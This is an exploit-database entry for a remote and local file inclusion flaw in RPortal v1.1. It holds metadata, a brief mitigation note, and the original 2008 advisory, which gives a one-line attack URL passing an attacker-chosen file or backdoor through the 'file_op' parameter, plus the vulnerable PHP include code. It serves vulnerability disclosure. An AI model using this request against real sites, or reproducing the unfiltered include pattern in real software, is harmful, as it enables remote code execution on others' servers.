header-logo
Suggest Exploit
vendor:
RPortal
by:
Kad
7.5
CVSS
HIGH
Remote and Local File Inclusion
98
CWE
Product Name: RPortal
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:rportal:rportal:1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

RPortal v1.1 Remote and Local File Inclusion Vulnerability

RPortal v1.1 is vulnerable to remote and local file inclusion. The variable $file_op is not filtered, allowing an attacker to inject malicious code and execute commands.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the application.
Source

Exploit-DB raw data:

#########################################################
#
# RPortal v1.1
#
#
# Rportal is a management system of contents simple and powerful Web,
# enabling you to create your site in a few minutes, while profiting
# from a complete and effective administration.
#
#
# Remote and Local File Inclusion Vulnerability <= 1.1
# Found the 29th September 2008

##########################################################
# Author: Kad
#
# mail : kadfrox [ a ] gmail [ dot ] com
#
##########################################################
#
# script : RPortal v 1.1
# http://www.rportal.org/?op=download&fid=36
#
##########################################################

[~] Exploit :


http://www.site.com/index.php?file_op=[url]

#
# Vulnerable code source :
#

if(!isset($file_op))$file_op='';

if($file_op!="")

{
    $op_basepath = trim(strrev(strstr(strrev($file_op),"/php/")));

    if($op_basepath!='') $op_basepath = str_replace("/php/", "/", $op_basepath);

    include($file_op);

}

# The problem is that the variable $file_op is not filtered
# Then, you can put the link that you want, like your own backdoor
# and execute commands.

# milw0rm.com [2008-10-01]